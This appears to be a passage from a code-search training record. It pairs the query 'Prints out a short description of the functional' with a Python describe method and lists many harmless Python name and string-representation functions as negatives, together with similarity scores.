grad_fn={}\".format(\n self.grad_fn.__class__.__name__) if sgf is not None else \"\"\n )", "def get_name():\n return \"SVMd+ - simplified approach\"", "def name(self) -> str: # pragma: no cover", "def __repr__(self):\n text = f'Name:{self.name}'\n return text", "def cFormal(self):\n if not self.type:\n return self.name # special case for '...'\n else:\n arr = self.array or ''\n pointers = self.pointers or ''\n return \"%s %s%s%s\" % (self.type, pointers, self.name, arr)", "def _get_name(self):\n return '%s: %s-%s' % (\n self.fcs_number,\n self.parameter_type,\n self.parameter_value_type)", "def get_name() -> str:\n pass", "def get_data_name(data_func, data_type, npoints, y_error_sigma, x_error_sigma):\n data_name = '{}_{}'.format(data_func.__name__, data_type)\n if data_func.__name__ != 'get_image':\n data_name += 'funcs'\n data_name += '_{}pts_{}ye'.format(npoints, y_error_sigma)\n if x_error_sigma is not None:\n data_name += '_{}xe'.format(x_error_sigma)\n return data_name.replace('.', '_')", "def name(self):\n # type: () -> str\n return str(self)", "def name(self):\n # type: () -> str\n return str(self)", "def as_function_name(self, string):\n return idaapi.COLSTR(string, idaapi.SCOLOR_CNAME)", "def fortran_function(self) -> str:\n if self.f_override is not None:\n return indent(\n self.f_override.replace('$CLASSNAME$', self.class_name).replace(\n \"$C_PREFIX$\", self.c_prefix).replace(\n \"$F_PREFIX$\", self.f_prefix),\n 4*' ')\n\n result = ''\n\n # declaration\n func_name = '{}_{}_{}'.format(\n self.f_prefix, self.class_name, self.name)\n in_parameters = self._f_in_parameters()\n return_type, out_parameters = self._f_out_parameters()\n if self.may_throw:\n out_parameters.append(('integer, optional', 'err_code'))\n out_parameters.append(('character(:), allocatable, optional',\n 'err_msg'))\n\n all_parameters = in_parameters + out_parameters\n arg_list = ', &\\n'.join([par_name for _, par_name in all_parameters])\n arg_ilist = indent(arg_list, 8*' ')\n if return_type != '':\n result += 'function {}( &\\n{})\\n'.format(func_name, arg_ilist)\n else:\n result += 'subroutine {}( &\\n{})\\n'.format(func_name, arg_ilist)\n\n # parameter declarations\n result += ' implicit none\\n'\n for par_type, par_name in in_parameters:\n result += ' {}, intent(in) :: {}\\n'.format(\n par_type, par_name)\n for par_type, par_name in out_parameters:\n result += ' {}, intent(out) :: {}\\n'.format(par_type, par_name)\n if return_type != '':\n result += ' {} :: {}\\n'.format(return_type, func_name)\n result += '\\n'\n\n # variable declarations\n c_return_type, fi_out_parameters = self._fi_out_parameters()\n if c_return_type:\n result += ' {} :: ret_val\\n'.format(c_return_type)\n for par_type, par_name in fi_out_parameters:\n result += ' {} :: {}\\n'.format(par_type, par_name)\n for par_type, par_name in self.ret_type.f_aux_variables():\n result += ' {} :: {}\\n'.format(par_type, par_name)\n if self.may_throw:\n result += ' integer (c_int) :: err_code_v\\n'\n result += ' type (c_ptr) :: err_msg_v\\n'\n result += ' integer (c_size_t) :: err_msg_len_v\\n'\n result += ' character (c_char), dimension(:), pointer :: err_msg_f\\n'\n result += ' character(:), allocatable :: err_msg_p\\n'\n result += ' integer (c_size_t) :: err_msg_i\\n'\n if c_return_type or fi_out_parameters or self.may_throw:\n result += '\\n'\n\n # convert input\n args = [param.f_chain_arg() for param in self.params]\n args += [par_name for _, par_name in fi_out_parameters]\n if self.may_throw:\n args += ['err_code_v', 'err_msg_v', 'err_msg_len_v']\n arg_str = ', &\\n'.join([8*' ' + arg for arg in args])\n\n # call C function\n fc_func_name = '{}_{}_{}_'.format(\n self.c_prefix, self.class_name, self.name)\n chain_call = self.fc_chain_call(\n ns_prefix=self.c_prefix, class_name=self.class_name,\n fc_func_name=fc_func_name, fc_args=arg_str)\n result_name = ''\n if return_type != '':\n result_name = func_name\n elif out_parameters:\n result_name = out_parameters[0][1]\n result += self.ret_type.f_call_c('ret_val', chain_call)\n\n # handle errors if necessary\n if self.may_throw:\n # Note: I tried to factor this out into a function, but Fortran\n # makes that near-impossible. Since we're generating anyway, it's\n # not really duplication, so leave it as is.\n result += indent(dedent(f\"\"\"\\\n if (err_code_v .ne. 0) then\n if (present(err_code)) then\n err_code = err_code_v\n if (present(err_msg)) then\n call c_f_pointer(err_msg_v, err_msg_f, (/err_msg_len_v/))\n allocate (character(err_msg_len_v) :: err_msg)\n do err_msg_i = 1, err_msg_len_v\n err_msg(err_msg_i:err_msg_i) = err_msg_f(err_msg_i)\n end do\n end if\n {dedent(\n self.ret_type.f_return_dummy_result(result_name))}\n return\n else\n call c_f_pointer(err_msg_v, err_msg_f, (/err_msg_len_v/))\n allocate (character(err_msg_len_v) :: err_msg_p)\n do err_msg_i = 1, err_msg_len_v\n err_msg_p(err_msg_i:err_msg_i) = err_msg_f(err_msg_i)\n end do\n print *, err_msg_p\n stop\n end if\n else\n if (present(err_code)) then\n err_code = 0\n end if\n end if\n\n \"\"\"), 4*' ')\n\n # convert and return result\n result += self.ret_type.f_return_result(result_name, 'ret_val')\n\n # end\n if return_type != '':\n result += 'end function {}\\n\\n'.format(func_name)\n else:\n result += 'end subroutine {}\\n\\n'.format(func_name)\n return indent(result, 4*' ')", "def get_function_raw_name_at(self, address):\n pass", "def __str__(self) -> str:\n return f'{self.name}.{self.arity}'", "def name(self) -> str:\n return self._formal_name", "def __str__(self):\n header = [\n ' ObjectiveFunction:']\n header += [('Function: {}').format(self.func.__name__)]\n header += [('Objective: {}').format(self.objective)]\n return ('\\n').join(header) + '\\n'", "def name(self):", "def name(self):", "def name(self):", "def name(self):", "def __str__(self):\n return f\"{self.name}\"", "def function_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"function_name\")", "def function(self) -> str:\n return pulumi.get(self, \"function\")", "def funcstring(funcname):\n s = str(funcname)[10:] #chop off '<function '\n spi = s.index(' ')\n return s[:spi]", "def describe(self):\n\n ret = []\n ret.append(\"Functional ID: %s\" % self._number)\n ret.append(\"Functional Name: %s\" % self._xc_func_name)\n ret.append(\"Attributes:\")\n ret.append(\" Name: %s\" % self._name)\n ret.append(\" Kind: %d\" % self._kind)\n ret.append(\" Family: %d\" % self._family)\n ret.append(\"Citations:\")\n for x in self._refs:\n ret.append(\" \" + x)\n\n return \"\\n\".join(ret)", "def hello(name):\n return f'Hello, {name}!'", "def __str__(self):\n return f'{self.name}' # TODO", "def __str__(self) -> str:\n return f'{self.name}'", "def __str__(self) -> str:\n return f'{self.name}'", "def __str__(self):\n return f\"{self.full_name} ({self.short_name})\"", "def __str__(self):\n return f\"{self.full_name} ({self.short_name})\"", "def funcname(func):\n try:\n return '%s()' % func.__name__\n except AttributeError:\n return repr(func)", "def function_name(parameters):", "def __str__(self):\n return f'{self.name}'", "def __str__(self):\n return f'{self.name}'", "def __str__(self):\r\n class_name = type(self).__name__\r\n return f'{class_name}({self.fname})'", "def _generate_function_specific_name(a, vertices):\n coeff_hash = hash(str(a))\n if coeff_hash < 0:\n # Cannot have minus sign in name\n coeff_hash *= -1\n vertices_hash = hash(str(vertices))\n if vertices_hash < 0:\n # Cannot have minus sign in name\n vertices_hash *= -1\n return str(coeff_hash) + \"_\" + str(vertices_hash)", "def __str__(self):\n return 'str-human.%s' % self.name", "def __str__(self):\n local_s = 'F30A: '\n local_s += '\\n'\n return local_s", "def function_name(cls):\n function_name = String(cls.__name__).snakecase().lower()\n return function_name", "def __str__(self):\n\n return \"name \\n\" + \" \" + str(self.name).center(9)", "def name(self):\n return f\"{self._name.replace('_', ' ')}\".title()", "def name(self):\n return 'data_extraction_for_' + '_'.join(self.names).lower()", "def get_name(self):", "def get_name(self):", "def name(self):\n return f\"{DEFAULT_NAME}_{BINARY_SENSOR}\"", "def display_name(self):", "def get_name():\n return \"SVMd+\"", "def printname(bruce):", "def full_name(self) -> str:\n\n if self.severity == 1:\n return self.name\n\n return f\"{self.name}[{self.severity}]\"", "def __str__(self):\n return f'<Name:{self.name}>'", "def __repr__(self):\n s = self.name\n if self.param != \"None\":\n s += ' with parameter '+self.param\n s += '; '+self.applyTo\n if self.applyTo != \"global\":\n s += ': '+self.conditions\n return s", "def __str__(self):\n s = ' KFData '\n s += 'vector: '+str(self.vec)+', \\t'\n s += 'matrix: '+str(self.cov)+', \\t'\n s += 'zrun: '+str(self.zrun)+',\\t'\n s += 'pars '+str(self.pars)\n return s", "def AttributeString(self) -> str:", "def AttributeString(self) -> str:", "def get_function_name(self):\n return self.__function", "def __str__(self):\n return f'<{self._name}>'", "def __str__(self):\n\n strme = \"fed method {} {} {} {}\"\\\n .format(TransitionMatrix.key, self.nout, self.n_upd, self.mode)\n\n return strme", "def simple(self) -> str:\n str_ = self.method\n if self.basis is not None:\n str_ += f'/{self.basis}'\n return str_" ]
[ "0.70717007", "0.6821342", "0.67295676", "0.67295676", "0.6623396", "0.6613039", "0.66009283", "0.6593334", "0.65830815", "0.654439", "0.6526365", "0.6526365", "0.6526365", "0.6526365", "0.6526365", "0.6521252", "0.6521252", "0.6521252", "0.6521252", "0.65120167", "0.6506895", "0.64964104", "0.64947915", "0.64947915", "0.6492182", "0.6492182", "0.6480339", "0.64508814", "0.6409289", "0.6393725", "0.63732564", "0.6372583", "0.6352849", "0.6350365", "0.63465613", "0.63465613", "0.63465613", "0.63465613", "0.63465613", "0.63465613", "0.6331348", "0.62898487", "0.62718433", "0.62333894", "0.6232135", "0.6231429", "0.6230003", "0.6227061", "0.6224759", "0.6194203", "0.61911815", "0.61911815", "0.6182352", "0.6173473", "0.6173082", "0.61640704", "0.6162362", "0.61497825", "0.61384183", "0.61384183", "0.61384183", "0.61384183", "0.6136714", "0.6133168", "0.61265206", "0.61245733", "0.6117015", "0.6116437", "0.61152893", "0.61075413", "0.61075413", "0.60718584", "0.60718584", "0.60705936", "0.60621476", "0.6061181", "0.6061181", "0.6056758", "0.6055933", "0.60527325", "0.6048542", "0.6025761", "0.6013507", "0.6012942", "0.60102165", "0.6005957", "0.6005957", "0.60012066", "0.6000711", "0.5993947", "0.598898", "0.59886223", "0.59606475", "0.59587747", "0.595738", "0.5956446", "0.5956446", "0.59536093", "0.5951155", "0.59449977", "0.5943859" ]
0.0
-1
Prints out a short description of the functional
def describe(self): ret = [] ret.append("Functional ID: %s" % self._number) ret.append("Functional Name: %s" % self._xc_func_name) ret.append("Attributes:") ret.append(" Name: %s" % self._name) ret.append(" Kind: %d" % self._kind) ret.append(" Family: %d" % self._family) ret.append("Citations:") for x in self._refs: ret.append(" " + x) return "\n".join(ret)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __repr__(self):\n\t\treturn self.func.__doc__", "def __repr__(self):\r\n return self.func.__doc__", "def __repr__(self):\r\n return self.func.__doc__", "def __repr__(self):\r\n return self.func.__doc__", "def __repr__(self):\r\n return self.func.__doc__", "def __repr__(self):\r\n return self.func.__doc__", "def __repr__(self):\n return self.func.__doc__", "def __repr__(self):\n return self.func.__doc__", "def __repr__(self):\n return self.func.__doc__", "def __repr__(self):\r\n return self.func.__doc__", "def __repr__(self):\n return self.func.__doc__", "def __repr__(self):\n return self.func.__doc__", "def __repr__(self):\n return self.func.__doc__", "def __repr__(self):\n return self.func.__doc__", "def __repr__(self):\n return self.func.__doc__", "def __repr__(self):\n return self.func.__doc__", "def __repr__(self):\n return self.func.__doc__", "def __repr__(self):\n return self.func.__doc__", "def description():", "def show_details(name, f, is_partial=False):\n print '%s:' % name\n print '\\tobject:', f\n if not is_partial:\n print '\\t__name__:', f.__name__\n print '\\t__doc__', repr(f.__doc__)\n if is_partial:\n print '\\tfunc:', f.func\n print '\\targs:', f.args\n print '\\tkeywords:', f.keywords\n return", "def describe(self) -> str:", "def describe():", "def display_message():\n\tprint(\"Learnt to write functions, which are named blocks of code that are designed to do one specific job.\")", "def explain(self):", "def usage() :\n\n print usage.__doc__", "def printhelp():", "def display_message():\n\tprint(\"In this chapter we will be learning how to write functions\")", "def description(self):", "def _summary(function):\n if not function.__doc__:\n return \"{}.\".format(function.__name__.capitalize())\n result = []\n for word in function.__doc__.split():\n result.append(word)\n if word.endswith(\".\"):\n break\n return \" \".join(result)", "def describe(self):\n print(self.description)", "def describe(self):\n print(self.description)", "def func_doc():", "def usage():", "def usage():", "def describe(self):\n return ''", "def usage():\n print(__doc__.strip())", "def summary_string(self) -> str:", "def print_actions_help():\n print(\\\n'''\\n\nTools for handling SELAFIN files and TELEMAC binary related in python\\n\nP ossible actions:\\n\n scan will print information about the SELAFIN, such as variables,\n their vales etc.\n spec will print information about a spectral file (also SELAFIN),\n such as frequencies, periodes, etc.\n chop will chop a SELAFIN given a new set of time range and step (but\n alter is better)\n alter will alter a SELAFIN file, choping or modifying time,\n converting its coordinates, extracting variables, etc.\n merge will merge two files together, whether they are continuous\n simulations (same variables) or putting variables together\n (same time definition)\n subdivide will subdivide a mesh by one iteration (splitting all triangles\n in four others)\n ''')", "def show_class_details(name, f):\n print '%s:' % name\n print '\\tobject:', f\n print '\\t__name__:', \n try:\n print f.__name__\n except AttributeError:\n print '(no __name__)'\n print '\\t__doc__', repr(f.__doc__)\n return", "def help_description():\n pass", "def help():", "def display_message():\n message = \"I am learning about functions, function calls, parameters and \"\n message+= \"arguments.\"\n print(message)", "def help():\n \n pass", "def summary(self):\n\n print(\"input label:\", self.__input_label)\n print(\"target label:\", self.__target_label)\n print(\"denoising label:\", self.denoising_label)\n print(\"contains a successful DE:\", self.is_successful())", "def get_description(self):\n text = \"is a student's t distribution; characterised by its degrees of freedom, which here is\"+str(self.dofs)+\".\"\n return text", "def usage():\n pass", "def __str__(self):\n header = [\n ' ObjectiveFunction:']\n header += [('Function: {}').format(self.func.__name__)]\n header += [('Objective: {}').format(self.objective)]\n return ('\\n').join(header) + '\\n'", "def display_short(self):\n print(f'{self.name.upper()} ({self.speciality.upper()})')", "def description() -> str:\n content = \"Demonstrates usage of blackbord remappings.\\n\"\n content += \"\\n\"\n content += \"Demonstration is via an exemplar behaviour making use of remappings..\\n\"\n\n if py_trees.console.has_colours:\n banner_line = console.green + \"*\" * 79 + \"\\n\" + console.reset\n s = banner_line\n s += console.bold_white + \"Blackboard\".center(79) + \"\\n\" + console.reset\n s += banner_line\n s += \"\\n\"\n s += content\n s += \"\\n\"\n s += banner_line\n else:\n s = content\n return s", "def get_description(self):\n print(\"This Iron door.\")", "def display_usage():\n print >> sys.stderr, __doc__", "def print_intro(self):\n \n print('Did you know mammals tend to have the shortest migration routes because walking takes more energy than flying or swimming?')", "def show_help():\n pass", "def describe(self):\r\n print( self.name + \" is here!\" )\r\n print( self.description )", "def display_message():\n\tmessage = \"I'm learning how to use function.\"\n\tprint(message)", "def print_help(self):\r\n\r\n print (\"\"\"Show data values for assignment.\r\n\r\nUsage:\r\n cat <request or table path>\r\n cat --id <assignment_id> #Where assignment_id provided by 'vers <table path>' command\r\n\r\nFormatting flags:\r\n\r\n -c or --comments - Show comments on/off\r\n -nc or --no-comments\r\n\r\n -ph or --horizontal - Print table horizontally\r\n -pa or --vertical - Print table vertically\r\n (If no '--horizontal' or '--vertical' flag is given, the layout of table is determined automatically:\r\n vertical layout if table has only 1 row and more than 3 columns, horizontal otherwise)\r\n\r\n -b or --borders - Switch show borders on of off\r\n -nb or --no-borders\r\n\r\n -h or --header - Show header on/off\r\n -nh or --no-header\r\n\r\n -t or --time - Show time\r\n -nt or --no-time\r\n\r\nExamples:\r\n > cat /test/test_vars/test_table #print latest data for test_table\r\n > cat /test/test_vars/test_table::subtest #print latest data in subtest variation\r\n > cat /test/test_vars/test_table:::2012-08 #print data latest for august 2012\r\n\r\nSee also 'dump' command which is 'cat' formatted to save data to files. 'help dump'\r\n\r\n \"\"\")", "def print_help():\n print(bcolors.OKBLUE, \" \", \"=\"*80, bcolors.ENDC, sep=\"\")\n print(\"\"\" HELP\n \n No arg: Enter formula and get assembly printed on the screen\n 1 arg : Enter file and get file.asm (excluding the keyword \"help\")\n >2 arg: This screen shows up\n\"\"\")\n print(bcolors.OKBLUE, \" \", \"=\"*80, bcolors.ENDC, sep=\"\", end=\"\\n\\n\")", "def describe(f, verbose=False):\n return better_arg_spec(f, verbose)", "def Description(self) -> str:", "def Description(self) -> str:", "def print_help():\n print \"\\n# File Operations:\"\n print \" put [lpath] [spath] - upload file from lpath to spath\"\n print \" get [spath] [lpath] - download file at spath to lpath\"\n print \" mv [path1] [path2] - move stratus file from path1 to path2\"\n print \" link [path] - get web links to stratus file at given path\"\n print \" rm [path] - delete stratus file at given path\"", "def show(self,verbose=0):\n print 'inferenceArgs',self.ws.inferenceArgs\n print 'inferenceExpr',theano.pp(self.ws.inferenceExpr)\n if verbose>=1:\n print 'debugprint inferenceExpr:'\n theano.printing.debugprint(self.ws.inferenceExpr)\n if self.ws.dataLossExpr:\n print 'dataLossArgs',self.ws.dataLossArgs\n print 'dataLossExpr',theano.pp(self.ws.dataLossExpr)\n print 'debugprint dataLossExpr:'\n theano.printing.debugprint(self.ws.dataLossExpr)", "def showUsage():\n None", "def display_message():\n msg = \"I'm learning to store code in functions.\"\n print(msg)", "def help(self):\n res = \"\"", "def display_help(self):\n pass", "def description(self):\n pass", "def description(self):\n pass", "def __repr__(self) -> str:\n return f\"<Function[{self.name}](line:{self.line})>\"", "def fn(): # fn definition # help2\r\n print(my_text)", "def showInstructions():\n print(\"\"\"\n RPG Game\n ========\n Commands:\n go [direction]\n get [item]\n\n\t\"\"\")", "def printHelpFunc(self, func, leadingstrings=None):\n if leadingstrings is None:\n leadingstrings = ['- ', ' ']\n a, idx = 0, None\n for line in func.__doc__.split('\\n'):\n if len(line) == 0:\n continue\n if idx is None:\n idx = len(line) - len(line.lstrip(' '))\n if len(line) == idx:\n continue\n print(leadingstrings[a] + line[idx:])\n a = 1", "def info_on_utils_functions():\n\n table = PrettyTable([\"Utils functions\", \"Description\"])\n table.add_row(\n [\n \"clear_cache()\",\n (\n \"Clears the cache folder. \"\n \"Useful when updating `premise`\"\n \"or encountering issues with \"\n \"inventories.\"\n ),\n ]\n )\n table.add_row(\n [\n \"get_regions_definition(model)\",\n \"Retrieves the list of countries for each region of the model.\",\n ]\n )\n table.add_row(\n [\n \"ndb.NewDatabase(...)\\nndb.generate_scenario_report()\",\n \"Generates a summary of the most important scenarios' variables.\",\n ]\n )\n # align text to the left\n table.align = \"l\"\n table.hrules = ALL\n table._max_width = {\"Utils functions\": 50, \"Description\": 32}\n print(table)", "def getHelp(self,func = None):\n if func == None:\n print(self.__doc__)\n pass\n else:\n print(func.__doc__)\n pass", "def hook_description(self) -> str:", "def simple():", "def simple():", "def summary(self) -> str:\n pass", "def _show(self, indent = 0):\n print(\" \"*indent, \"Name:\", self.name)\n print(\" \"*indent, \"Description:\", self.description)", "def summary(self):\n return ''", "def summary_line_and_description():", "def help(self, *args):\n for _, v in self.useage.items():\n print v.__doc__", "def summarize(self):\n info(\"Running \" + self.title + \" generator\")", "def describe(self) -> Text:\n return self.__repr__()", "def summary(self):\n return \"{0:}: {1:} -> {2:}\".format(self.name, self.var, self.out)", "def help(self):", "def help(self):", "def summary(self):\n name = 'name : ' + self.get_name()\n description = 'description : ' + self.get_description()\n agility = 'agility : ' + str(self.get_agility())\n strength = 'strength : ' + str(self.get_strength())\n health_points = 'health_points : ' + str(self.get_health_points())\n summary = '\\n'.join([name, description, agility, strength, health_points])\n if self.take_weapon():\n summary += self.take_weapon().summary()\n return summary", "def print_hint(self):\n print(self.__doc__)", "def display(self):\n print(\"{}, {}\".format(self.label, self.params))", "def print_methods():\n print('''1. Sobol Variance Based:\n first and total order''')\n print('''2. Regional Sensitivity Analysis:\n also called Monte Carlo Filtering''')\n print('''3. Morris Screening Method:\n with pre-optimized defined trajects and group option''')\n print('''4. Sampled-OAT:\n Latin HYpercube or Sobol sampling with OAT sensitivity''')\n print('''5. Standardized Regression Coefficients:\n Latin HYpercube or Sobol sampling with linear regression''')\n print('''6. DYNamic Identifiability Analysis:\n Latin HYpercube or Sobol sampling with time-sliced based\n evaluation''')", "def introduction():\n \n print('WCA shifted Lennard-Jones potential')\n print('Diameter, sigma = 1')\n print('Well depth, epsilon = 1')\n print('Lees-Edwards boundaries')\n if fast:\n print('Fast NumPy force routine')\n else:\n print('Slow Python force routine')\n print('Uses neighbour lists')", "def logic_program_form(self):\r\n return '% -------------------------------------\\n' +\\\r\n '% Theory ' + self.name + '\\n' +\\\r\n '% -------------------------------------\\n\\n' +\\\r\n GENERAL_AXIOMS", "def help_description():\n # for ain\n print(\"--------TABLE FOR AIN(AIN4=GND)-------\")\n print(\"--------------------------------------\")\n print(\"| CODE (10) | CODE (2) | AINP | AINN |\")\n for i in range(8):\n print(\"| {} | {} | AIN{} | AIN{} |\".format(str(i), bin(i)[2:].zfill(3), DICT_AIN[i][0],\n DICT_AIN[i][1]))\n print(\"--------------------------------------\")\n print(\"------------TABLE FOR FSR------------\")\n print(\"--------------------------------------\")\n print(\"| CODE (10) | CODE (2) | FSR |\")\n for i in range(6):\n print(\"| {} | {} | {} |\".format(str(i), bin(i)[2:].zfill(3), DICT_FSR[i]))\n print(\"--------------------------------------\")\n print(\"------------TABLE FOR RATE------------\")\n print(\"--------------------------------------\")\n print(\"| CODE (10) | CODE (2) | RATE |\")\n for i in range(8):\n print(\"| {} | {} | {} |\".format(str(i), bin(i)[2:].zfill(3), DICT_RATE[i].rjust(7, ' ')))\n print(\"--------------------------------------\")", "def function_label(function):\n args = getargspec(function.function)[0]\n args = ', '.join(args)\n output = function.output_labels\n output = ', '.join(output)\n label = \"Link from %s to %s\" % (args, output)\n return label", "def printSummary(self):\n pass", "def __str__(self) -> str:\n if self.decorator is None:\n decorator_str = \"\"\n elif self.decorator:\n decorator_str = \"+\"\n else:\n decorator_str = \"-\"\n return \" \".join([\"The nilpotent orbit corresponding\",\n f\"to partition {self.my_diagram}{decorator_str}\",\n f\"in type {self.my_type.letter()} {self.lie_rank}\"])", "def print_summary(self):\n #exec(\"print(storyline.{}_clause+', '+storyline.{}_clause.lower()+', '+storyline.{}_clause.lower())\".format(\"A\", \"B\", \"C\"))\n #exec(\"print(self.{}_clause+', '+self.{}_clause.lower()+', '+self.{}_clause.lower())\".format(\"A\", \"B\", \"C\"))\n lwr = \".lower()\"\n exec(\"print(\"+str(3*(\"self.{}_clause{}+',', \")).format(\"A\",\"\",\"B\",lwr,\"C\",lwr)+\"'\\b\\b')\")", "def printUsage():\n print 'Usage: wue2stein.py nodeFile edgeFile steinFile'", "def __str__(self):\n\n strme = \"fed method {} {} {} {}\"\\\n .format(UmbrellaSampling.key, self.x0, self.kf, self.n_upd)\n\n return strme" ]
[ "0.7420096", "0.73075235", "0.73075235", "0.73075235", "0.73075235", "0.73075235", "0.72935873", "0.72935873", "0.72935873", "0.72896236", "0.7270395", "0.7270395", "0.7270395", "0.7270395", "0.7270395", "0.7270395", "0.7270395", "0.7270395", "0.7167525", "0.7109541", "0.69818276", "0.69633824", "0.6812129", "0.6797366", "0.67299414", "0.664648", "0.6646416", "0.66241515", "0.66191506", "0.6610698", "0.6610698", "0.66031444", "0.651108", "0.651108", "0.649883", "0.648516", "0.64775145", "0.6463342", "0.64565456", "0.6445121", "0.6442087", "0.6423719", "0.6414336", "0.64026254", "0.6402326", "0.6394812", "0.63816446", "0.6358813", "0.6340196", "0.63385123", "0.6335649", "0.6333734", "0.63248396", "0.6320015", "0.6310993", "0.6303345", "0.6300618", "0.6283043", "0.6274199", "0.6274199", "0.6266916", "0.62547517", "0.62464833", "0.6211855", "0.62082124", "0.62039626", "0.6194705", "0.6194705", "0.61759686", "0.61708796", "0.61647606", "0.6163661", "0.615775", "0.6152382", "0.61436945", "0.61433387", "0.61433387", "0.6141855", "0.61406463", "0.61401063", "0.6139494", "0.61390924", "0.6137989", "0.61357415", "0.6130724", "0.61286443", "0.61286443", "0.6128248", "0.612775", "0.6123972", "0.61218107", "0.61210835", "0.6115514", "0.6112705", "0.61104864", "0.61031795", "0.6102682", "0.60957444", "0.60834944", "0.60771513" ]
0.6748803
24
Returns the LibXCFunctional ID.
def get_number(self): return self._number
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getId(self):\n return _libsbml.FunctionDefinition_getId(self)", "def get_func_id_from_tsuid(self, tsuid):\n check_type(value=tsuid, allowed_types=str, var_name=\"tsuid\", raise_exception=True)\n\n response = self.send(root_url=self.session.dm_url + self.root_url,\n verb=GenericClient.VERB.GET,\n template=TEMPLATES['get_one_functional_identifier'],\n uri_params={'tsuid': tsuid},\n data=None,\n files=None)\n\n check_http_code(response)\n\n return response.json['funcId']", "def unique_id(self):\n return f\"{self._device.uuid}-FAN\"", "def data_factory_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"data_factory_id\")", "def unique_id(self) -> str:\n return get_frigate_entity_unique_id(\n self._config_entry.entry_id, \"sensor_status\", \"frigate\"\n )", "def _get_device_id(api: Mobileclient) -> str:\n\n try:\n _get_device_id_from_environment()\n except KeyError:\n pass\n\n return _get_device_id_from_registered(api)", "def uuid(self):\n if openmediavault.string.is_fs_uuid(self._id):\n return self._id\n return self.get_udev_property('ID_FS_UUID')", "def data_factory_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"data_factory_id\")", "def get_device_id(self):\n raise DeviceException(DeviceException.FEATURE_NOT_IMPLEMENTED)", "def getId(self):\n return _libsbml.SpeciesFeature_getId(self)", "def dev_id(self):\n return self.setup.dev_id", "def identifier(self):\n return str(self._nfcid)", "def device_id(self):\n return self.unique_id", "def get_id(self):\n try:\n return self.inst.query('*IDN?')[:36]\n except errors.VisaIOError as e:\n logger.warning(e)\n return 'Device not connected.'", "def get_firmware_id(self):\n build_id_addr = self._get_slt_entry(1)\n build_id_int = self.get_data(build_id_addr)\n if build_id_addr % Arch.addr_per_word != 0:\n # in a 32 bit word, the 16 bit build ID int can be in either the 2\n # MS bytes or 2 LS bytes\n build_id_int >>= 16\n return build_id_int & 0xFFFF", "def unique_id(self) -> str:\n return get_frigate_entity_unique_id(\n self._config_entry.entry_id, \"gpu_load\", self._gpu_name\n )", "def data_factory_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"data_factory_id\")", "def get_id(self): # real signature unknown; restored from __doc__\n return \"\"", "def getId(self):\n return _libsbml.SpeciesFeatureType_getId(self)", "def generate_id():\n\treturn \"%s-%s\" % (str(uuid.uuid4())[:4],random.choice(funnames).lower())", "def unique_id(self) -> str | None:\n return f\"{self._station_id}_{self._fuel_type}\"", "def build_id():\n return \"test123\"", "def get_id(self):\n\t\treturn call_sdk_function('PrlSrvCfgDev_GetId', self.handle)", "def device_id(self):\n data = fcntl.ioctl(self._fd, _EVIOCGID, '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00')\n idbus, idvendor, idproduct, idversion = struct.unpack(\"hhhh\", data)\n return idbus, idvendor, idproduct, idversion", "def get_file_id(self, lfn):\n\n raise NotImplementedError('get_file_id')", "def facility_id(self):\n return self.facility_names.get(\n self.facility, self.facility_names['user'])", "def id(self):\n # Might also be a first 12-characters shortcut.\n return self._id", "def retrieve_device_id(self):\n raise DeviceException(DeviceException.FEATURE_NOT_IMPLEMENTED)", "def unique_id(self) -> str:\n return get_frigate_entity_unique_id(\n self._config_entry.entry_id, \"sensor_temp\", self._name\n )", "def get_debug_firmware_id(self):\n # Read the address via get_var_strict; this will fetch the value\n # from chipdata as well, but we can ignore it.\n int_addr = self.debuginfo.get_var_strict(\n '$_build_identifier_integer'\n ).address\n build_id_int = self.debuginfo.get_dm_const(int_addr, 0)\n if Arch.addr_per_word == 4:\n # in a 32 bit word, the 16 bit build ID int can be in either the 2\n # MS bytes or 2 LS bytes\n if int_addr % Arch.addr_per_word != 0:\n build_id_int >>= 16\n build_id_int &= 0xFFFF\n return build_id_int", "def generate_id():\n return \"%s-%s\" % (str(uuid.uuid4())[:4],random.choice(funnames).lower())", "def unique_id(self) -> str:\n return f\"{self._mac}_tracker\"", "def device_id(self):\n return self._id[0]", "def unique_id(self):\n return self.device_id", "def external_id(self) -> str:\n return self._search_in_properties(ATTR_GUID)", "def device_id(self) -> str:\n return self._device_info[\"ID\"]", "def getID():", "def idfname(self):\n if self._idfname is None:\n idfname = StringIO(f\"VERSION, {self.as_version};\")\n idfname.seek(0)\n self._idfname = idfname\n else:\n if isinstance(self._idfname, StringIO):\n self._idfname.seek(0)\n else:\n self._idfname = Path(self._idfname).expand()\n return self._idfname", "def id(self) -> str:\n return self.properties[DBUS_ATTR_ID]", "def unique_id(self):\n return self._device_id", "def id(self) -> str:\n\n return self._inst.query('*IDN?')", "def unique_id() -> str:", "def uuid():\n from dallinger.experiment import Experiment\n\n click.echo(Experiment.make_uuid())", "def generate_id(cls):\n cls._index += 1\n return 'fp_%s' % cls._index", "def unique_id(self) -> str:\n return f\"{self._device.unique_id}_battery\"", "def unique_id(self) -> str:\n return '{0}_{1}'.format(self._mac.replace(':', ''), self.entity_id)", "def id(self) -> str:\n pass", "def unique_id(self) -> str:\n return get_frigate_entity_unique_id(\n self._config_entry.entry_id, \"sensor_fps\", \"detection\"\n )", "def get_fsid(cluster):\n fsid = get_conf_with_default(cluster=cluster, variable='fsid')\n if fsid is None:\n raise Error('getting cluster uuid from configuration failed')\n return fsid.lower()", "def get_identifier(self):", "def get_tsuid_from_fid(self, fid):\n check_is_fid_valid(fid=fid, raise_exception=True)\n\n # empty result => throws IkatsNotFoundError\n res = self.search_functional_identifiers(criterion_type='funcIds', criteria_list=[fid])\n\n assert (isinstance(res, list)), \"get_tsuid_from_func_id: failed to retrieve json result as list\"\n assert (isinstance(res[0], dict)), \"get_tsuid_from_func_id: failed to retrieve first item from result list\"\n return res[0]['tsuid']", "def unique_id(self):\n return self._device.serial", "def unique_id(self) -> Optional[str]:\n return self._device.device_id", "def unique_identifier(self) -> str:\n return pulumi.get(self, \"unique_identifier\")", "def get_ticket_id():\n return str(time.time()) + str(uuid.uuid4())", 